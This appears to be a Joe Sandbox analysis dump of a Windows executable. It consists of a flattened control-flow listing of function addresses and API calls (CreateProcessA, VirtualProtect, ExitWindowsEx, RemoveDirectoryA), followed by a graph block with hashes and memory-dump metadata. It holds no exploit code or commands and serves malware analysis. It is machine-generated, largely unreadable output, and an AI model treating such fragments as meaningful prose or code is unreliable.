5706 408e18 18 API calls 5706->5707 5707->5706 5708 403278 18 API calls 5707->5708 5709 408f27 5707->5709 5708->5707 5709->5638 5711 405890 18 API calls 5710->5711 5712 408e29 5711->5712 5712->5700 5762 406a58 5713->5762 5716 406d26 5718 406a58 19 API calls 5716->5718 5720 406d72 5716->5720 5719 406d36 5718->5719 5721 406d42 5719->5721 5723 406a34 21 API calls 5719->5723 5770 406888 5720->5770 5721->5720 5724 406d67 5721->5724 5727 406a58 19 API calls 5721->5727 5723->5721 5724->5720 5782 406cc8 GetWindowsDirectoryA 5724->5782 
5729 406d5b 5727->5729 5728 406638 19 API calls 5730 406d87 5728->5730 5729->5724 5732 406a34 21 API calls 5729->5732 5731 40322c 4 API calls 5730->5731 5733 406d91 5731->5733 5732->5724 5734 4031b8 4 API calls 5733->5734 5735 406dab 5734->5735 5735->5563 5737 409244 5736->5737 5738 406638 19 API calls 5737->5738 5739 40925d 5738->5739 5740 40322c 4 API calls 5739->5740 5745 409268 5740->5745 5742 406978 20 API calls 5742->5745 5743 4033b4 18 API calls 5743->5745 5744 408dd8 18 API calls 5744->5745 5745->5742 5745->5743 5745->5744 5747 405890 18 API calls 5745->5747 5748 4092e4 5745->5748 5822 4091b0 5745->5822 5830 409034 5745->5830 5747->5745 5749 40322c 4 API calls 5748->5749 5750 4092ef 5749->5750 5751 4031b8 4 API calls 5750->5751 5752 409309 5751->5752 5753 403198 4 API calls 5752->5753 5754 409311 5753->5754 5754->5563 5756 4051a8 33 API calls 5755->5756 5757 404cb2 5756->5757 5757->5563 5759 408dc8 5758->5759 5858 408c80 5759->5858 5763 4034f0 18 API calls 5762->5763 5764 406a6b 5763->5764 5765 406a82 GetEnvironmentVariableA 5764->5765 5769 406a95 5764->5769 5784 406dec 5764->5784 5765->5764 5766 406a8e 5765->5766 5767 403198 4 API calls 5766->5767 5767->5769 5769->5716 5779 406a34 5769->5779 5771 403414 5770->5771 5772 4068ab GetFullPathNameA 5771->5772 5773 4068b7 5772->5773 5774 4068ce 5772->5774 5773->5774 5775 4068bf 5773->5775 5776 40322c 4 API calls 5774->5776 5777 403278 18 API calls 5775->5777 5778 4068cc 5776->5778 5777->5778 5778->5728 5788 4069dc 5779->5788 5783 406ce9 5782->5783 5783->5720 5785 406dfa 5784->5785 5786 4034f0 18 API calls 5785->5786 5787 406e08 5786->5787 5787->5764 5795 406978 5788->5795 5790 4069fe 5791 406a06 GetFileAttributesA 5790->5791 5792 406a1b 5791->5792 5793 403198 4 API calls 5792->5793 5794 406a23 5793->5794 5794->5716 5805 406744 5795->5805 5797 4069b0 5800 4069c6 5797->5800 5801 4069bb 5797->5801 5799 406989 5799->5797 5812 406970 CharPrevA 5799->5812 5813 403454 5800->5813 5802 40322c 4 API calls 5801->5802 5804 
4069c4 5802->5804 5804->5790 5809 406755 5805->5809 5806 4067b9 5807 4067b4 5806->5807 5808 406680 IsDBCSLeadByte 5806->5808 5807->5799 5808->5807 5809->5806 5811 406773 5809->5811 5811->5807 5820 406680 IsDBCSLeadByte 5811->5820 5812->5799 5814 403486 5813->5814 5816 403459 5813->5816 5815 403198 4 API calls 5814->5815 5817 40347c 5815->5817 5816->5814 5818 40346d 5816->5818 5817->5804 5819 403278 18 API calls 5818->5819 5819->5817 5821 406694 5820->5821 5821->5811 5823 403198 4 API calls 5822->5823 5826 4091d1 5823->5826 5827 4091fe 5826->5827 5839 4032a8 5826->5839 5842 403494 5826->5842 5828 403198 4 API calls 5827->5828 5829 409213 5828->5829 5829->5745 5846 408f70 5830->5846 5832 40904a 5833 40904e 5832->5833 5852 406a48 5832->5852 5833->5745 5836 409081 5855 408fac 5836->5855 5840 403278 18 API calls 5839->5840 5841 4032b5 5840->5841 5841->5826 5843 4034c3 5842->5843 5844 403498 5842->5844 5843->5826 5845 4034f0 18 API calls 5844->5845 5845->5843 5847 408f7a 5846->5847 5848 408f7e 5846->5848 5847->5832 5849 408fa0 SetLastError 5848->5849 5850 408f87 Wow64DisableWow64FsRedirection 5848->5850 5851 408f9b 5849->5851 5850->5851 5851->5832 5853 4069dc 21 API calls 5852->5853 5854 406a52 GetLastError 5853->5854 5854->5836 5856 408fb1 Wow64RevertWow64FsRedirection 5855->5856 5857 408fbb 5855->5857 5856->5857 5857->5745 5859 403198 4 API calls 5858->5859 5866 408cb1 5858->5866 5859->5866 5860 408cdc 5861 4031b8 4 API calls 5860->5861 5862 408d69 5861->5862 5862->5563 5863 408cc8 5865 4032fc 18 API calls 5863->5865 5864 403278 18 API calls 5864->5866 5865->5860 5866->5860 5866->5863 5866->5864 5867 4032fc 18 API calls 5866->5867 5867->5866 5869 406744 IsDBCSLeadByte 5868->5869 5871 406835 5869->5871 5870 40687f 5870->5570 5871->5870 5872 406680 IsDBCSLeadByte 5871->5872 5872->5871 5874 4068f3 5873->5874 5875 406820 IsDBCSLeadByte 5874->5875 5877 4068fe 5875->5877 5876 4066ea 5876->5575 5876->5576 5877->5876 5878 406680 IsDBCSLeadByte 5877->5878 5878->5877 5880 406957 
5879->5880 5881 40695b 5879->5881 5880->5590 5884 406970 CharPrevA 5881->5884 5883 40696c 5883->5590 5884->5883 5886 402bd5 RaiseException 5885->5886 5887 402be6 5885->5887 5886->5887 5887->5613 6140 402e64 6141 402e69 6140->6141 6142 402e7a RtlUnwind 6141->6142 6143 402e5e 6141->6143 6144 402e9d 6142->6144 6157 40667c IsDBCSLeadByte 6158 406694 6157->6158 6666 403f7d 6668 403fa2 6666->6668 6670 403f84 6666->6670 6667 403f8c 6669 403e8e 4 API calls 6668->6669 6668->6670 6669->6670 6670->6667 6671 402674 4 API calls 6670->6671 6672 403fca 6671->6672 6679 403d02 6684 403d12 6679->6684 6680 403ddf ExitProcess 6681 403db8 6682 403cc8 4 API calls 6681->6682 6683 403dc2 6682->6683 6686 403cc8 4 API calls 6683->6686 6684->6680 6684->6681 6685 403dea 6684->6685 6689 403da4 6684->6689 6690 403d8f MessageBoxA 6684->6690 6687 403dcc 6686->6687 6699 4019dc 6687->6699 6695 403fe4 6689->6695 6690->6681 6691 403dd1 6691->6680 6691->6685 6696 403fe8 6695->6696 6697 403f07 4 API calls 6696->6697 6698 404006 6697->6698 6700 401abb 6699->6700 6701 4019ed 6699->6701 6700->6691 6702 401a04 RtlEnterCriticalSection 6701->6702 6703 401a0e LocalFree 6701->6703 6702->6703 6704 401a41 6703->6704 6705 401a2f VirtualFree 6704->6705 6706 401a49 6704->6706 6705->6704 6707 401a70 LocalFree 6706->6707 6708 401a87 6706->6708 6707->6707 6707->6708 6709 401aa9 RtlDeleteCriticalSection 6708->6709 6710 401a9f RtlLeaveCriticalSection 6708->6710 6709->6691 6710->6709 6163 404206 6164 4041cc 6163->6164 6167 40420a 6163->6167 6165 404282 6166 403154 4 API calls 6168 404323 6166->6168 6167->6165 6167->6166 6169 402c08 6172 402c82 6169->6172 6173 402c19 6169->6173 6170 402c56 RtlUnwind 6171 403154 4 API calls 6170->6171 6171->6172 6173->6170 6173->6172 6176 402b28 6173->6176 6177 402b31 RaiseException 6176->6177 6178 402b47 6176->6178 6177->6178 6178->6170 6179 408c10 6180 408c17 6179->6180 6181 403198 4 API calls 6180->6181 6189 408cb1 6181->6189 6182 408cdc 6183 4031b8 4 API calls 6182->6183 6184 408d69 
6183->6184 6185 408cc8 6187 4032fc 18 API calls 6185->6187 6186 403278 18 API calls 6186->6189 6187->6182 6188 4032fc 18 API calls 6188->6189 6189->6182 6189->6185 6189->6186 6189->6188 6190 40a011 6191 40a036 6190->6191 6192 407918 InterlockedExchange 6191->6192 6193 40a060 6192->6193 6194 40a070 6193->6194 6195 409aa0 18 API calls 6193->6195 6200 4076ac SetEndOfFile 6194->6200 6195->6194 6197 40a08c 6198 4025ac 4 API calls 6197->6198 6199 40a0c3 6198->6199 6201 4076c3 6200->6201 6202 4076bc 6200->6202 6201->6197 6203 40748c 35 API calls 6202->6203 6203->6201 6711 409916 6712 409918 6711->6712 6713 40993a 6712->6713 6714 409956 CallWindowProcA 6712->6714 6714->6713 5939 407017 5940 407008 SetErrorMode 5939->5940 6208 403018 6209 403070 6208->6209 6210 403025 6208->6210 6211 40302a RtlUnwind 6210->6211 6212 40304e 6211->6212 6214 402f78 6212->6214 6215 402be8 6212->6215 6216 402bf1 RaiseException 6215->6216 6217 402c04 6215->6217 6216->6217 6217->6209 6721 409918 6722 40993a 6721->6722 6724 409927 6721->6724 6723 409956 CallWindowProcA 6723->6722 6724->6722 6724->6723 6222 40901e 6223 409010 6222->6223 6224 408fac Wow64RevertWow64FsRedirection 6223->6224 6225 409018 6224->6225 6226 409020 SetLastError 6227 409029 6226->6227 6242 403a28 ReadFile 6243 403a46 6242->6243 6244 403a49 GetLastError 6242->6244 6077 40762c ReadFile 6078 407663 6077->6078 6079 40764c 6077->6079 6080 407652 GetLastError 6079->6080 6081 40765c 6079->6081 6080->6078 6080->6081 6082 40748c 35 API calls 6081->6082 6082->6078 6249 40a02c 6250 409aa0 18 API calls 6249->6250 6251 40a031 6250->6251 6252 40a036 6251->6252 6253 402f24 5 API calls 6251->6253 6254 407918 InterlockedExchange 6252->6254 6253->6252 6255 40a060 6254->6255 6256 40a070 6255->6256 6257 409aa0 18 API calls 6255->6257 6258 4076ac 36 API calls 6256->6258 6257->6256 6259 40a08c 6258->6259 6260 4025ac 4 API calls 6259->6260 6261 40a0c3 6260->6261 6729 40712e 6730 407118 6729->6730 6731 403198 4 API calls 6730->6731 6732 407120 
6731->6732 6733 403198 4 API calls 6732->6733 6734 407128 6733->6734 6735 408f30 6738 408dfc 6735->6738 6739 408e05 6738->6739 6740 403198 4 API calls 6739->6740 6741 408e13 6739->6741 6740->6739 6742 403932 6743 403924 6742->6743 6746 40374c 6743->6746 6745 40392c 6747 403766 6746->6747 6748 403759 6746->6748 6747->6745 6748->6747 6749 403779 VariantClear 6748->6749 6749->6745 5888 4075c4 SetFilePointer 5889 4075f7 5888->5889 5890 4075e7 GetLastError 5888->5890 5890->5889 5891 4075f0 5890->5891 5892 40748c 35 API calls 5891->5892 5892->5889 6262 4076c8 WriteFile 6263 4076e8 6262->6263 6264 4076ef 6262->6264 6266 40748c 35 API calls 6263->6266 6265 407700 6264->6265 6267 4073ec 34 API calls 6264->6267 6266->6264 6267->6265 6268 40a2ca 6277 4096fc 6268->6277 6271 402f24 5 API calls 6272 40a2d4 6271->6272 6273 403198 4 API calls 6272->6273 6274 40a2f3 6273->6274 6275 403198 4 API calls 6274->6275 6276 40a2fb 6275->6276 6286 4056ac 6277->6286 6279 409745 6282 403198 4 API calls 6279->6282 6280 409717 6280->6279 6292 40720c 6280->6292 6284 40975a 6282->6284 6283 409735 6285 40973d MessageBoxA 6283->6285 6284->6271 6285->6279 6287 403154 4 API calls 6286->6287 6289 4056b1 6287->6289 6288 4056c9 6288->6280 6289->6288 6290 403154 4 API calls 6289->6290 6291 4056bf 6290->6291 6291->6280 6293 4056ac 4 API calls 6292->6293 6294 40721b 6293->6294 6295 407221 6294->6295 6296 40722f 6294->6296 6297 40322c 4 API calls 6295->6297 6298 40723f 6296->6298 6300 40724b 6296->6300 6301 40722d 6297->6301 6303 4071d0 6298->6303 6310 4032b8 6300->6310 6301->6283 6304 40322c 4 API calls 6303->6304 6305 4071df 6304->6305 6306 4071fc 6305->6306 6307 406950 CharPrevA 6305->6307 6306->6301 6308 4071eb 6307->6308 6308->6306 6309 4032fc 18 API calls 6308->6309 6309->6306 6311 403278 18 API calls 6310->6311 6312 4032c2 6311->6312 6312->6301 6313 402ccc 6316 402cfe 6313->6316 6318 402cdd 6313->6318 6314 402d88 RtlUnwind 6315 403154 4 API calls 6314->6315 6315->6316 6317 402b28 RaiseException 6319 
402d7f 6317->6319 6318->6314 6318->6316 6318->6317 6319->6314 6758 403fcd 6759 403f07 4 API calls 6758->6759 6760 403fd6 6759->6760 6761 403e9c 4 API calls 6760->6761 6762 403fe2 6761->6762 6320 4024d0 6321 4024e4 6320->6321 6322 4024e9 6320->6322 6325 401918 4 API calls 6321->6325 6323 402518 6322->6323 6324 40250e RtlEnterCriticalSection 6322->6324 6327 4024ed 6322->6327 6335 402300 6323->6335 6324->6323 6325->6322 6329 402525 6331 402581 6329->6331 6332 402577 RtlLeaveCriticalSection 6329->6332 6330 401fd4 14 API calls 6333 402531 6330->6333 6332->6331 6333->6329 6345 40215c 6333->6345 6336 402314 6335->6336 6339 402335 6336->6339 6340 4023b8 6336->6340 6337 402344 6337->6329 6337->6330 6339->6337 6359 401b74 6339->6359 6340->6337 6343 402455 6340->6343 6362 401d80 6340->6362 6366 401e84 6340->6366 6343->6337 6344 401d00 9 API calls 6343->6344 6344->6337 6346 40217a 6345->6346 6347 402175 6345->6347 6348 4021ab RtlEnterCriticalSection 6346->6348 6351 4021b5 6346->6351 6353 40217e 6346->6353 6349 401918 4 API calls 6347->6349 6348->6351 6349->6346 6350 4021c1 6354 4022e3 RtlLeaveCriticalSection 6350->6354 6355 4022ed 6350->6355 6351->6350 6352 402244 6351->6352 6357 402270 6351->6357 6352->6353 6356 401d80 7 API calls 6352->6356 6353->6329 6354->6355 6355->6329 6356->6353 6357->6350 6358 401d00 7 API calls 6357->6358 6358->6350 6360 40215c 9 API calls 6359->6360 6361 401b95 6360->6361 6361->6337 6363 401d92 6362->6363 6364 401d89 6362->6364 6363->6340 6364->6363 6365 401b74 9 API calls 6364->6365 6365->6363 6371 401768 6366->6371 6368 401e99 6369 401ea6 6368->6369 6382 401dcc 6368->6382 6369->6340 6372 401787 6371->6372 6373 40183b 6372->6373 6374 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6372->6374 6375 40132c LocalAlloc 6372->6375 6377 401821 6372->6377 6379 4017d6 6372->6379 6380 4017e7 6373->6380 6393 4015c4 6373->6393 6374->6372 6375->6372 6378 40150c VirtualFree 6377->6378 6378->6380 6389 40150c 6379->6389 6380->6368 6383 401d80 9 API calls 
6382->6383 6384 401de0 6383->6384 6397 40132c 6384->6397 6386 401df0 6388 401df8 6386->6388 6401 401b44 6386->6401 6388->6369 6392 40153b 6389->6392 6390 401594 6390->6380 6391 401568 VirtualFree 6391->6392 6392->6390 6392->6391 6395 40160a 6393->6395 6394 40163a 6394->6380 6395->6394 6396 401626 VirtualAlloc 6395->6396 6396->6394 6396->6395 6398 401348 6397->6398 6406 4012e4 6398->6406 6402 401b61 6401->6402 6403 401b52 6401->6403 6402->6388 6404 401d00 9 API calls 6403->6404 6405 401b5f 6404->6405 6405->6388 6409 40128c 6406->6409 6410 401298 LocalAlloc 6409->6410 6411 4012aa 6409->6411 6410->6411 6411->6386 6412 4028d2 6413 4028da 6412->6413 6414 403554 4 API calls 6413->6414 6415 4028ef 6413->6415 6414->6413 6416 4025ac 4 API calls 6415->6416 6417 4028f4 6416->6417 6763 4019d3 6764 4019ba 6763->6764 6765 4019c3 RtlLeaveCriticalSection 6764->6765 6766 4019cd 6764->6766 6765->6766 5893 407fd4 5894 407fe6 5893->5894 5896 407fed 5893->5896 5904 407f10 5894->5904 5897 408021 5896->5897 5899 408015 5896->5899 5900 408017 5896->5900 5898 40804e 5897->5898 5902 407d7c 33 API calls 5897->5902 5918 407e2c 5899->5918 5915 407d7c 5900->5915 5902->5898 5905 407f25 5904->5905 5906 407d7c 33 API calls 5905->5906 5907 407f34 5905->5907 5906->5907 5908 407f6e 5907->5908 5909 407d7c 33 API calls 5907->5909 5910 407f82 5908->5910 5911 407d7c 33 API calls 5908->5911 5909->5908 5914 407fae 5910->5914 5925 407eb8 5910->5925 5911->5910 5914->5896 5928 4058c4 5915->5928 5917 407d9e 5917->5897 5919 405194 33 API calls 5918->5919 5920 407e57 5919->5920 5936 407de4 5920->5936 5922 407e5f 5923 403198 4 API calls 5922->5923 5924 407e74 5923->5924 5924->5897 5926 407ec7 VirtualFree 5925->5926 5927 407ed9 VirtualAlloc 5925->5927 5926->5927 5927->5914 5929 4058d0 5928->5929 5930 405194 33 API calls 5929->5930 5931 4058fd 5930->5931 5932 4031e8 18 API calls 5931->5932 5933 405908 5932->5933 5934 403198 4 API calls 5933->5934 5935 40591d 5934->5935 5935->5917 5937 4058c4 33 API calls 5936->5937 
5938 407e06 5937->5938 5938->5922 6422 405ad4 6423 405ae4 6422->6423 6424 405adc 6422->6424 6425 405ae2 6424->6425 6426 405aeb 6424->6426 6429 405a4c 6425->6429 6427 405940 19 API calls 6426->6427 6427->6423 6430 405a54 6429->6430 6431 405a6e 6430->6431 6432 403154 4 API calls 6430->6432 6433 405a73 6431->6433 6434 405a8a 6431->6434 6432->6430 6436 405940 19 API calls 6433->6436 6435 403154 4 API calls 6434->6435 6437 405a8f 6435->6437 6438 405a86 6436->6438 6439 4059b0 33 API calls 6437->6439 6440 403154 4 API calls 6438->6440 6439->6438 6441 405ab8 6440->6441 6442 403154 4 API calls 6441->6442 6443 405ac6 6442->6443 6443->6423 6444 40a0d5 6445 40a105 6444->6445 6446 40a10f CreateWindowExA SetWindowLongA 6445->6446 6447 405194 33 API calls 6446->6447 6448 40a192 6447->6448 6449 4032fc 18 API calls 6448->6449 6450 40a1a0 6449->6450 6451 4032fc 18 API calls 6450->6451 6452 40a1ad 6451->6452 6453 406b7c 19 API calls 6452->6453 6454 40a1b9 6453->6454 6455 4032fc 18 API calls 6454->6455 6456 40a1c2 6455->6456 6457 4099a4 43 API calls 6456->6457 6458 40a1d4 6457->6458 6459 409884 19 API calls 6458->6459 6460 40a1e7 6458->6460 6459->6460 6461 40a220 6460->6461 6462 4094d8 9 API calls 6460->6462 6463 40a239 6461->6463 6466 40a233 RemoveDirectoryA 6461->6466 6462->6461 6464 40a242 DestroyWindow 6463->6464 6465 40a24d 6463->6465 6464->6465 6467 40a275 6465->6467 6468 40357c 4 API calls 6465->6468 6466->6463 6469 40a26b 6468->6469 6470 4025ac 4 API calls 6469->6470 6470->6467 5941 40a0e7 5942 40a0eb SetLastError 5941->5942 5973 409648 GetLastError 5942->5973 5945 40a105 5947 40a10f CreateWindowExA SetWindowLongA 5945->5947 5946 402f24 5 API calls 5946->5945 5948 405194 33 API calls 5947->5948 5949 40a192 5948->5949 5950 4032fc 18 API calls 5949->5950 5951 40a1a0 5950->5951 5952 4032fc 18 API calls 5951->5952 5953 40a1ad 5952->5953 5986 406b7c GetCommandLineA 5953->5986 5956 4032fc 18 API calls 5957 40a1c2 5956->5957 5991 4099a4 5957->5991 5960 409884 19 API calls 5961 40a1e7 
5960->5961 5962 40a220 5961->5962 5963 40a207 5961->5963 5965 40a239 5962->5965 5968 40a233 RemoveDirectoryA 5962->5968 6007 4094d8 5963->6007 5966 40a242 DestroyWindow 5965->5966 5967 40a24d 5965->5967 5966->5967 5969 40a275 5967->5969 6015 40357c 5967->6015 5968->5965 5971 40a26b 5972 4025ac 4 API calls 5971->5972 5972->5969 5974 404c94 33 API calls 5973->5974 5975 40968f 5974->5975 5976 407284 19 API calls 5975->5976 5977 40969f 5976->5977 5978 408da8 18 API calls 5977->5978 5979 4096b4 5978->5979 5980 405890 18 API calls 5979->5980 5981 4096c3 5980->5981 5982 4031b8 4 API calls 5981->5982 5983 4096e2 5982->5983 5984 403198 4 API calls 5983->5984 5985 4096ea 5984->5985 5985->5945 5985->5946 5987 406af0 18 API calls 5986->5987 5988 406ba1 5987->5988 5989 403198 4 API calls 5988->5989 5990 406bbf 5989->5990 5990->5956 5992 4033b4 18 API calls 5991->5992 5993 4099df 5992->5993 5994 409a11 CreateProcessA 5993->5994 5995 409a24 CloseHandle 5994->5995 5996 409a1d 5994->5996 5998 409a2d 5995->5998 5997 409648 35 API calls 5996->5997 5997->5995 6028 409978 5998->6028 6001 409a49 6002 409978 3 API calls 6001->6002 6003 409a4e GetExitCodeProcess CloseHandle 6002->6003 6004 409a6e 6003->6004 6005 403198 4 API calls 6004->6005 6006 409a76 6005->6006 6006->5960 6006->5961 6008 409532 6007->6008 6010 4094eb 6007->6010 6008->5962 6009 4094f3 Sleep 6009->6010 6010->6008 6010->6009 6011 409503 Sleep 6010->6011 6013 40951a GetLastError 6010->6013 6032 408fbc 6010->6032 6011->6010 6013->6008 6014 409524 GetLastError 6013->6014 6014->6008 6014->6010 6016 403591 6015->6016 6017 4035a0 6015->6017 6022 4035d0 6016->6022 6023 40359b 6016->6023 6025 4035b6 6016->6025 6018 4035b1 6017->6018 6019 4035b8 6017->6019 6020 403198 4 API calls 6018->6020 6021 4031b8 4 API calls 6019->6021 6020->6025 6021->6025 6022->6025 6026 40357c 4 API calls 6022->6026 6023->6017 6024 4035ec 6023->6024 6024->6025 6040 403554 6024->6040 6025->5971 6026->6022 6029 40998c PeekMessageA 6028->6029 6030 409980 
TranslateMessage DispatchMessageA 6029->6030 6031 40999e MsgWaitForMultipleObjects 6029->6031 6030->6029 6031->5998 6031->6001 6033 408f70 2 API calls 6032->6033 6034 408fd2 6033->6034 6035 408fd6 6034->6035 6036 408ff2 DeleteFileA GetLastError 6034->6036 6035->6010 6037 409010 6036->6037 6038 408fac Wow64RevertWow64FsRedirection 6037->6038 6039 409018 6038->6039 6039->6010 6041 403566 6040->6041 6043 403578 6041->6043 6044 403604 6041->6044 6043->6024 6045 40357c 6044->6045 6046 4035a0 6045->6046 6051 40359b 6045->6051 6052 4035b6 6045->6052 6053 4035d0 6045->6053 6047 4035b1 6046->6047 6048 4035b8 6046->6048 6049 403198 4 API calls 6047->6049 6050 4031b8 4 API calls 6048->6050 6049->6052 6050->6052 6051->6046 6054 4035ec 6051->6054 6052->6041 6053->6052 6055 40357c 4 API calls 6053->6055 6054->6052 6056 403554 4 API calls 6054->6056 6055->6053 6056->6054 6770 402be9 RaiseException 6771 402c04 6770->6771 6477 402af2 6478 402afe 6477->6478 6481 402ed0 6478->6481 6482 403154 4 API calls 6481->6482 6483 402ee0 6482->6483 6484 402b03 6483->6484 6486 402b0c 6483->6486 6487 402b25 6486->6487 6488 402b15 RaiseException 6486->6488 6487->6484 6488->6487 6772 402dfa 6773 402e26 6772->6773 6774 402e0d 6772->6774 6776 402ba4 6774->6776 6777 402bc9 6776->6777 6778 402bad 6776->6778 6777->6773 6779 402bb5 RaiseException 6778->6779 6779->6777 6780 4075fa GetFileSize 6781 407626 6780->6781 6782 407616 GetLastError 6780->6782 6782->6781 6783 40761f 6782->6783 6784 40748c 35 API calls 6783->6784 6784->6781 6785 406ffb 6786 407008 SetErrorMode 6785->6786 6493 403a80 CloseHandle 6494 403a90 6493->6494 6495 403a91 GetLastError 6493->6495 6496 40a282 6498 40a1f4 6496->6498 6497 40a220 6500 40a239 6497->6500 6503 40a233 RemoveDirectoryA 6497->6503 6498->6497 6499 4094d8 9 API calls 6498->6499 6499->6497 6501 40a242 DestroyWindow 6500->6501 6502 40a24d 6500->6502 6501->6502 6504 40a275 6502->6504 6505 40357c 4 API calls 6502->6505 6503->6500 6506 40a26b 6505->6506 6507 4025ac 4 API calls 
6506->6507 6507->6504 6508 404283 6509 4042c3 6508->6509 6510 403154 4 API calls 6509->6510 6511 404323 6510->6511 6787 404185 6788 4041ff 6787->6788 6789 4041cc 6788->6789 6790 403154 4 API calls 6788->6790 6791 404323 6790->6791 6512 40a287 6513 40a290 6512->6513 6515 40a2bb 6512->6515 6522 409448 6513->6522 6517 403198 4 API calls 6515->6517 6516 40a295 6516->6515 6520 40a2b3 MessageBoxA 6516->6520 6518 40a2f3 6517->6518 6519 403198 4 API calls 6518->6519 6521 40a2fb 6519->6521 6520->6515 6523 409454 GetCurrentProcess OpenProcessToken 6522->6523 6524 4094af ExitWindowsEx 6522->6524 6525 409466 6523->6525 6526 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6523->6526 6524->6525 6525->6516 6526->6524 6526->6525 6527 403e87 6528 403e4c 6527->6528 6529 403e67 6528->6529 6530 403e62 6528->6530 6531 403e7b 6528->6531 6534 403e78 6529->6534 6540 402674 6529->6540 6536 403cc8 6530->6536 6533 402674 4 API calls 6531->6533 6533->6534 6538 403cd6 6536->6538 6537 403ceb 6537->6529 6538->6537 6539 402674 4 API calls 6538->6539 6539->6537 6541 403154 4 API calls 6540->6541 6542 40267a 6541->6542 6542->6534 6551 407e90 6552 407eb8 VirtualFree 6551->6552 6553 407e9d 6552->6553 6796 403991 6797 403983 6796->6797 6798 40374c VariantClear 6797->6798 6799 40398b 6798->6799 6556 403e95 6557 403e4c 6556->6557 6558 403e67 6557->6558 6559 403e62 6557->6559 6560 403e7b 6557->6560 6563 403e78 6558->6563 6564 402674 4 API calls 6558->6564 6561 403cc8 4 API calls 6559->6561 6562 402674 4 API calls 6560->6562 6561->6558 6562->6563 6564->6563 6565 403a97 6566 403aac 6565->6566 6567 403bbc GetStdHandle 6566->6567 6568 403b0e CreateFileA 6566->6568 6577 403ab2 6566->6577 6569 403c17 GetLastError 6567->6569 6582 403bba 6567->6582 6568->6569 6570 403b2c 6568->6570 6569->6577 6572 403b3b GetFileSize 6570->6572 6570->6582 6572->6569 6573 403b4e SetFilePointer 6572->6573 6573->6569 6578 403b6a ReadFile 6573->6578 6574 403be7 GetFileType 6576 403c02 CloseHandle 6574->6576 6574->6577 
6576->6577 6578->6569 6579 403b8c 6578->6579 6580 403b9f SetFilePointer 6579->6580 6579->6582 6580->6569 6581 403bb0 SetEndOfFile 6580->6581 6581->6569 6581->6582 6582->6574 6582->6577 6804 405ba2 6806 405ba4 6804->6806 6805 405be0 6809 405940 19 API calls 6805->6809 6806->6805 6807 405bf7 6806->6807 6808 405bda 6806->6808 6812 404cdc 19 API calls 6807->6812 6808->6805 6810 405c4c 6808->6810 6817 405bf3 6809->6817 6811 4059b0 33 API calls 6810->6811 6811->6817 6814 405c20 6812->6814 6813 403198 4 API calls 6816 405c86 6813->6816 6815 4059b0 33 API calls 6814->6815 6815->6817 6817->6813 6818 408da4 6819 408dc8 6818->6819 6820 408c80 18 API calls 6819->6820 6821 408dd1 6820->6821 6583 402caa 6584 403154 4 API calls 6583->6584 6585 402caf 6584->6585 6836 4011aa 6837 4011ac GetStdHandle 6836->6837 6083 4076ac SetEndOfFile 6084 4076c3 6083->6084 6085 4076bc 6083->6085 6086 40748c 35 API calls 6085->6086 6086->6084 6586 4028ac 6587 402594 18 API calls 6586->6587 6588 4028b6 6587->6588 6589 401ab9 6590 401a96 6589->6590 6591 401aa9 RtlDeleteCriticalSection 6590->6591 6592 401a9f RtlLeaveCriticalSection 6590->6592 6592->6591

                                                                              Control-flow Graph

                                                                              control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 133 409bb3-409bc0 VirtualProtect 132->133 133->121
                                                                              APIs
                                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 2441996862-0
                                                                              • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                              • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
